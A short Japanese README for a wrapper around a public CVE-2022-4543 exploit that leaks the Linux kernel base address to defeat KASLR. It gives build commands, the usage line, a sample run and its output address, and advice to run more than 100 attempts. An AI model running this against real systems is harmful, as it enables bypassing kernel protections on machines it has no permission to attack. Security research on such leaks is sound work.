
これは、willsroot の CVE-2022-4543 エクスプロイトのラッパーであり、カーネルのベースアドレスを判断して取得するのに役立ちます。
必要に応じて(任意):
gcc dekaslr.c --static -o dekaslr
g++ main.cpp --static -o main
一部の OS では、最初に静的 libc をインストールしてください。
./main
[*] Usage: ./binary dekaslr_path entry_SYSCALL_64_offset(in hex) max_loop
$ ./main ./dekaslr 0x100000 200
ffffffffa2600000: 53/200
両方のプログラムを実行すると、オフセットに基づいて最も頻繁に出現するアドレスが表示されます。
実際には、実際のカーネルベースアドレスは全体の試行回数の 1/4 以上で出現します。100 回以上試行することをお勧めします。